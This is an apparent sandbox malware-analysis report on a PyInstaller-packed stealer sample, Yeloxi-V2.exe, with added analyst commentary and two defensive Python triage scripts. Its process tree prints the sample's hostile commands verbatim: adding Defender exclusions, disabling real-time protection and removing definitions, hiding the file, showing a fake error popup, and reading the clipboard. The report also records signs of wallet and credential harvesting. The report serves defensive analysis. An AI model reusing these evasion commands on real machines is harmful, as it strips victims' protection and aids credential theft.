Analysis
max time kernel: 123s
max time network: 127s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 28-04-2024 14:22
Static task: static1
URLScan task: urlscan1
Malware Config
Signatures
-
Drops file in Drivers directory  3 IoCs
Processes:
  attrib.exe     File opened for modification  C:\Windows\System32\drivers\etc\hosts
  Yeloxi-V2.exe  File opened for modification  C:\Windows\System32\drivers\etc\hosts
  attrib.exe     File opened for modification  C:\Windows\System32\drivers\etc\hosts
The only path involved is the hosts file, which happens to live under System32\drivers\etc, so this signature records hosts-file tampering (name resolution overridden for whatever entries the sample writes), not a driver being dropped. The two attrib.exe opens correspond to the "Views/modifies file attributes" signature below: attrib.exe is used to change the attributes of the hosts file. On a live host, diff the file against a known-good copy and check its attributes, since a hidden or read-only hosts file is itself a tell.
-
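The report shows the hosts file being opened for writing but not what was written. The following is an added triage example (not part of the sandbox report or of the sample) that parses a Windows hosts file and reports every active mapping that is not a stock loopback alias, with a reason: entries sinkholed to loopback/0.0.0.0 (the usual way to block update or telemetry hosts) and entries pinned to some other fixed address. The sample hosts content is constructed with example.* domains and is not the content from this run; on the real host you would feed it C:\Windows\System32\drivers\etc\hosts.

```python
import ipaddress

# Names a stock hosts file legitimately maps to loopback; everything else is worth reporting.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
                  "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Yield (line_no, address, hostname) for every active mapping; comments and blanks are skipped."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        parts = line.split()                      # tabs and runs of spaces both count
        if len(parts) < 2:
            continue
        for name in parts[1:]:                    # one line may carry several hostnames
            yield no, parts[0], name.lower()


def hosts_tamper_report(text):
    """Every non-default mapping as (line_no, hostname, address, reason); empty list means clean."""
    findings = []
    for no, addr, name in parse_hosts(text):
        if name in LOOPBACK_NAMES:
            continue
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            findings.append((no, name, addr, "unparseable address"))
            continue
        if ip.is_loopback or ip.is_unspecified:
            findings.append((no, name, addr,
                             "sinkholed: resolves to loopback/0.0.0.0, so the host is unreachable"))
        else:
            findings.append((no, name, addr,
                             "pinned: resolves to a fixed address that bypasses DNS; verify the owner"))
    return findings


# Constructed sample (example.* domains); not the hosts content written by this sample.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#    127.0.0.1       localhost
#    ::1             localhost
127.0.0.1 localhost
::1 localhost
0.0.0.0\tupdate.example.com            # constructed: vendor update host blocked
127.0.0.1 telemetry.example.net cloud.example.net
203.0.113.7 login.example.org          # constructed: traffic steered to another address
not-an-ip  broken.example.com
"""

if __name__ == "__main__":
    for line_no, host, addr, reason in hosts_tamper_report(SAMPLE_HOSTS):
        print(f"line {line_no}: {host} -> {addr}: {reason}")
```

The parser deliberately treats a stock file as empty (every active line it ships with is a comment), so any finding at all is a deviation worth explaining; the attrib.exe activity in this report means the attribute check belongs next to the content check.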
Executes dropped EXE  1 IoCs
Processes:
  rar.exe  PID 232
-
Loads dropped DLL  17 IoCs
Processes:
  Yeloxi-V2.exe  PID 608  (17 loads; the DLLs are the PyInstaller runtime components listed under the YARA matches below)
-
YARA matches  rule: upx
The extraction directory C:\Users\Admin\AppData\Local\Temp\_MEI40642\ together with python311.dll identifies the sample as a PyInstaller onefile bundle of a Python 3.11 script. The upx rule fires on the bundled runtime DLLs and .pyd extension modules, and again on the same components once mapped into PID 608; Yeloxi-V2.exe itself is not among the matches, so the UPX hits describe the packaged Python runtime rather than the sample's own executable.
Files (all under C:\Users\Admin\AppData\Local\Temp\_MEI40642\):
  python311.dll, _ctypes.pyd, libffi-8.dll, _ssl.pyd, _sqlite3.pyd, _socket.pyd, _queue.pyd, _lzma.pyd, _hashlib.pyd, _decimal.pyd, _bz2.pyd, unicodedata.pyd, sqlite3.dll, select.pyd, libssl-3.dll, libcrypto-3.dll
Memory (behavioral1, PID 608; distinct regions, with the dump sequence numbers that matched in parentheses):
  0x00007FFCE5030000-0x00007FFCE5619000  (627, 882, 913, 929)
  0x00007FFCFD5C0000-0x00007FFCFD5CF000  (650, 945)
  0x00007FFCFA350000-0x00007FFCFA373000  (649, 894, 944)
  0x00007FFCF96E0000-0x00007FFCF970D000  (662, 946)
  0x00007FFCE5000000-0x00007FFCE5023000  (666, 918, 948)
  0x00007FFCF95E0000-0x00007FFCF95F9000  (665, 947)
  0x00007FFCE4E80000-0x00007FFCE4FF7000  (668, 919, 949)
  0x00007FFCE4E40000-0x00007FFCE4E73000  (674, 922, 952)
  0x00007FFCE4D70000-0x00007FFCE4E3D000  (677, 923, 953)
  0x00007FFCFD300000-0x00007FFCFD30D000  (673, 951)
  0x00007FFCE4840000-0x00007FFCE4D62000  (678, 924, 940)
  0x00007FFCF8F50000-0x00007FFCF8F69000  (672, 920, 950)
  0x00007FFCE4720000-0x00007FFCE483C000  (682, 943)
  0x00007FFCF83B0000-0x00007FFCF83C4000  (681, 941)
  0x00007FFCFD1E0000-0x00007FFCFD1ED000  (680, 942)
-
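The YARA list above is the raw sandbox output: file paths and behavioral1/memory/<pid>-<seq>-<start>-<end>-memory.dmp names, repeated for every dump in which the rule fired. The following is an added example (not sandbox code and not from the sample) that parses those identifiers: it recognises the PyInstaller _MEI extraction directory, recovers the bundled Python version from python3xx.dll, separates extension modules from native DLLs, and collapses the dump names into distinct mapped regions with sizes. The capability hints are an analyst heuristic of my own, not something the report states; the IoC list embedded below is the first seventeen memory entries and all sixteen file entries from this report.

```python
import re

MEM_RX = re.compile(r"^behavioral\d+/memory/(?P<pid>\d+)-(?P<seq>\d+)-"
                    r"0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")
MEI_RX = re.compile(r"\\_MEI(?P<id>\d+)\\(?P<file>[^\\]+)$")
PY_DLL_RX = re.compile(r"^python(?P<major>\d)(?P<minor>\d{1,2})\.dll$", re.I)

# Analyst heuristic (assumption, not from the report): what a bundled extension
# module usually tells you about what the packed script is able to do.
CAPABILITY_HINTS = {
    "_socket.pyd": "sockets",
    "_ssl.pyd": "TLS client",
    "_sqlite3.pyd": "SQLite access (browser login/cookie stores are SQLite files)",
    "_ctypes.pyd": "direct Win32 API calls",
    "libcrypto-3.dll": "OpenSSL crypto primitives",
}


def parse_region(ioc):
    """'behavioral1/memory/608-627-0x...-0x...-memory.dmp' -> dict with integer bounds, else None."""
    m = MEM_RX.match(ioc)
    if not m:
        return None
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"pid": int(m["pid"]), "seq": int(m["seq"]), "start": start, "end": end, "size": end - start}


def summarize_upx_matches(iocs):
    """Fold a list of YARA-match IoCs into one structured summary."""
    regions = {}                      # (start, end) -> dump sequence numbers that matched
    files, mei_ids, py_version = [], set(), None
    for ioc in iocs:
        r = parse_region(ioc)
        if r:
            regions.setdefault((r["start"], r["end"]), []).append(r["seq"])
            continue
        m = MEI_RX.search(ioc)
        if m:
            mei_ids.add(m["id"])
            files.append(m["file"])
            pm = PY_DLL_RX.match(m["file"])
            if pm:
                py_version = f"{pm['major']}.{pm['minor']}"
    largest = max(regions, key=lambda k: k[1] - k[0]) if regions else None
    return {
        "pyinstaller": bool(mei_ids),            # _MEI<digits> is PyInstaller's onefile temp dir
        "extraction_dirs": sorted("_MEI" + i for i in mei_ids),
        "python_version": py_version,
        "extension_modules": sorted(f for f in files if f.lower().endswith(".pyd")),
        "native_dlls": sorted(f for f in files if f.lower().endswith(".dll")),
        "capabilities": [CAPABILITY_HINTS[f] for f in sorted(files) if f in CAPABILITY_HINTS],
        "distinct_regions": len(regions),
        "dumps": sum(len(v) for v in regions.values()),
        "largest_region": None if largest is None else {
            "start": f"0x{largest[0]:016X}", "end": f"0x{largest[1]:016X}",
            "size": largest[1] - largest[0], "dumps": regions[largest]},
    }


MEI = r"C:\Users\Admin\AppData\Local\Temp\_MEI40642"
UPX_IOCS = [   # taken from this report's upx matches (first 17 memory entries, all 16 files)
    "behavioral1/memory/608-627-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp",
    rf"{MEI}\python311.dll", rf"{MEI}\_ctypes.pyd", rf"{MEI}\libffi-8.dll", rf"{MEI}\_ssl.pyd",
    rf"{MEI}\_sqlite3.pyd", rf"{MEI}\_socket.pyd", rf"{MEI}\_queue.pyd", rf"{MEI}\_lzma.pyd",
    rf"{MEI}\_hashlib.pyd", rf"{MEI}\_decimal.pyd", rf"{MEI}\_bz2.pyd", rf"{MEI}\unicodedata.pyd",
    rf"{MEI}\sqlite3.dll", rf"{MEI}\select.pyd", rf"{MEI}\libssl-3.dll", rf"{MEI}\libcrypto-3.dll",
    "behavioral1/memory/608-650-0x00007FFCFD5C0000-0x00007FFCFD5CF000-memory.dmp",
    "behavioral1/memory/608-649-0x00007FFCFA350000-0x00007FFCFA373000-memory.dmp",
    "behavioral1/memory/608-662-0x00007FFCF96E0000-0x00007FFCF970D000-memory.dmp",
    "behavioral1/memory/608-666-0x00007FFCE5000000-0x00007FFCE5023000-memory.dmp",
    "behavioral1/memory/608-665-0x00007FFCF95E0000-0x00007FFCF95F9000-memory.dmp",
    "behavioral1/memory/608-668-0x00007FFCE4E80000-0x00007FFCE4FF7000-memory.dmp",
    "behavioral1/memory/608-674-0x00007FFCE4E40000-0x00007FFCE4E73000-memory.dmp",
    "behavioral1/memory/608-677-0x00007FFCE4D70000-0x00007FFCE4E3D000-memory.dmp",
    "behavioral1/memory/608-673-0x00007FFCFD300000-0x00007FFCFD30D000-memory.dmp",
    "behavioral1/memory/608-678-0x00007FFCE4840000-0x00007FFCE4D62000-memory.dmp",
    "behavioral1/memory/608-672-0x00007FFCF8F50000-0x00007FFCF8F69000-memory.dmp",
    "behavioral1/memory/608-682-0x00007FFCE4720000-0x00007FFCE483C000-memory.dmp",
    "behavioral1/memory/608-681-0x00007FFCF83B0000-0x00007FFCF83C4000-memory.dmp",
    "behavioral1/memory/608-680-0x00007FFCFD1E0000-0x00007FFCFD1ED000-memory.dmp",
    "behavioral1/memory/608-882-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp",
    "behavioral1/memory/608-894-0x00007FFCFA350000-0x00007FFCFA373000-memory.dmp",
]

if __name__ == "__main__":
    for key, value in summarize_upx_matches(UPX_IOCS).items():
        print(f"{key}: {value}")
```

The largest region (0x5E9000 bytes, matched in dumps 627 and 882) is the one to pull first when you want the interpreter's memory, and the .pyd list is a cheap first answer to "what can this script do" before you unpack the bundle.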
Accesses cryptocurrency files/wallets, possible credential harvesting  2 TTPs
(no per-process IoCs are listed for this signature in the report)
-
Legitimate hosting services abused for malware hosting/C2  1 TTPs 2 IoCs
(no per-process IoCs are listed here; the only hosting-service URL visible in this report is the fastupload.io download in the process tree)
-
Looks up external IP address via web service  2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Network flows:
  flow 205  ip-api.com
  flow 230  ip-api.com
-
Enumerates physical storage devices  1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed  1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
  WMIC.exe  PIDs 5320, 5516, 2132
-
Enumerates processes with tasklist  1 TTPs 5 IoCs
Processes:
  tasklist.exe  PIDs 5296, 5968, 5032, 5488, 5552
PIDs are recycled over the run (5032 and 2132 also appear under taskkill below), so correlate on image name and time, not on PID alone.
-
Enumerates system info in registry  2 TTPs 3 IoCs
Processes:
  msedge.exe  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
  msedge.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
  msedge.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
These BIOS reads are attributed to msedge.exe, the browser used to download the archive, not to the sample.
-
Gathers system information  1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill  38 IoCs
Processes:
  taskkill.exe  PIDs 5032, 700, 5848, 6084, 2248, 2132, 1492, 4768, 3644, 5708, 4968, 2972, 5504, 676, 572, 4124, 5028, 3392, 4264, 676, 5704, 1492, 5504, 5948, 2388, 2200, 928, 3464, 5692, 1992, 4688, 4908, 6052, 3904, 4912, 2916, 276, 1520
Thirty-eight taskkill invocations inside a run of about two minutes (676, 1492 and 5504 each appear twice, i.e. PIDs were recycled). The targets are not shown in this report, but a burst of this size from a freshly downloaded executable is a strong behavioural indicator on its own.
-
Modifies registry class  1 IoCs
Processes:
  msedge.exe  Key created  \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings
-
NTFS ADS  1 IoCs
Processes:
  msedge.exe  File opened for modification  C:\Users\Admin\Downloads\Yeloxi-V2.zip:Zone.Identifier
This is Edge's quarantine service writing the Mark-of-the-Web stream onto the downloaded archive (see the quarantine.mojom.Quarantine child in the process tree); the sample was then run from the extracted folder C:\Users\Admin\Downloads\Yeloxi-V2\.
-
Runs ping.exe  1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses  33 IoCs
Processes:
  msedge.exe           PIDs 1636 (x2), 3860 (x2), 5532 (x2), 5424 (x2)
  identity_helper.exe  PID 1312 (x2)
  powershell.exe       PIDs 3644 (x3), 5344 (x3), 3156 (x3), 700 (x3), 5412 (x3), 3604 (x2), 2264 (x2), 772 (x2), 5772 (x2)
Nine distinct powershell.exe instances; only two PowerShell command lines appear in the process-tree excerpt below, so most of these belong to the part of the tree not included here.
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary  23 IoCs
Processes:
  msedge.exe  PID 3860 (23 entries)
All from the Edge browser process: Chromium starts its sandboxed children with the block-non-Microsoft-binaries mitigation, so this is expected browser behaviour rather than sample activity.
-
Suspicious use of AdjustPrivilegeToken  64 IoCs
Processes (in the order listed; the table stops at 64 entries):
  AUDIODG.EXE     PID 4748  Token: 33, SeIncBasePriorityPrivilege
  WMIC.exe        PID 6096  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  tasklist.exe    PID 5296  Token: SeDebugPrivilege
  powershell.exe  PID 3644  Token: SeDebugPrivilege
  WMIC.exe        PID 6096  Token: the same 21-entry set a second time
  powershell.exe  PID 5344  Token: SeDebugPrivilege
  WMIC.exe        PID 5320  Token: SeIncreaseQuotaPrivilege through SeManageVolum ePrivilege (same set; the listing is cut off here by the 64-entry cap)
The numeric entries are privilege LUIDs the sandbox did not resolve to names: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege. Enabling this whole set is WMIC.exe's standard start-up behaviour, and powershell.exe likewise enables SeDebugPrivilege on start, so these rows reflect the discovery and PowerShell commands rather than a separate privilege-escalation step.
-
Suspicious use of FindShellTrayWindow  62 IoCs
Processes:
  msedge.exe  PID 3860 (62 entries)
-
Suspicious use of SendNotifyMessage  12 IoCs
Processes:
  msedge.exe  PID 3860 (12 entries)
-
Suspicious use of WriteProcessMemory  64 IoCs
Processes:
  msedge.exe (PID 3860) wrote to the memory of its own msedge.exe children: PID 232 (2 entries), PID 1800, PID 1636 (2 entries) and PID 784; the listing stops at 64 entries.
Parent-to-child writes of this kind are how Chromium passes launch data to a new process; none of these entries involve the sample.
-
Views/modifies file attributes  1 TTPs 3 IoCs
Processes:
  attrib.exe  PIDs 5544, 2964, 2584
Processes
Tree depth is shown in brackets; each entry gives the image, then the exact command line, then the signatures attributed to that process. "[2] msedge.exe" entries use the same image path as the depth-1 browser process. Two strings that recur verbatim on every Edge child are abbreviated:
  {FTH} = --field-trial-handle=1948,6850740891086685608,479117044083629726,131072
  {RENDERER} = --type=renderer {FTH} --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation
(the two renderers marked "instant" carry --instant-process directly after --disable-client-side-phishing-detection.)

[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://fastupload.io/en/qrTsYtdAHwxx9JI/file
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    This is the browser session that fetched the archive from fastupload.io. The crashpad annotations below identify the sandbox's browser as Microsoft Edge 90.0.818.66 (Chromium 90.0.4430.212). Every depth-2 entry under it is an ordinary Edge service or renderer child, and the signatures on them are browser housekeeping, not sample activity.
  [2] msedge.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcfa333cb8,0x7ffcfa333cc8,0x7ffcfa333cd8
  [2] msedge.exe --type=gpu-process {FTH} --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:2
  [2] msedge.exe --type=utility --utility-sub-type=network.mojom.NetworkService {FTH} --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
  [2] msedge.exe --type=utility --utility-sub-type=storage.mojom.StorageService {FTH} --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
  [2] msedge.exe {RENDERER} --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
  [2] msedge.exe --type=utility --utility-sub-type=audio.mojom.AudioService {FTH} --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3376 /prefetch:8
  [2] msedge.exe {RENDERER} --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService {FTH} --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6472 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
  [2] msedge.exe {RENDERER} --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7932 /prefetch:1
  [2] msedge.exe --type=utility --utility-sub-type=chrome.mojom.UtilWin {FTH} --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7896 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
  [2] msedge.exe {RENDERER} --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  [2] msedge.exe {RENDERER} (instant) --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
  [2] msedge.exe {RENDERER} --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:1
  [2] msedge.exe {RENDERER} (instant) --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
  [2] msedge.exe --type=utility --utility-sub-type=quarantine.mojom.Quarantine {FTH} --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8260 /prefetch:8
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses
      The quarantine service is the process that writes the Zone.Identifier stream on Yeloxi-V2.zip (see "NTFS ADS" above).
  [2] msedge.exe {RENDERER} --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

[1] C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
[1] C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
[1] C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004F0
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    DCOM activation (-Embedding) of a shell32 COM local server; background Windows activity with no signatures attached.
C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"1⤵
-
C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404', 0, 'Error', 0+16);close()""3⤵
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404', 0, 'Error', 0+16);close()"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe""3⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌  .scr'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌  .scr'4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
-
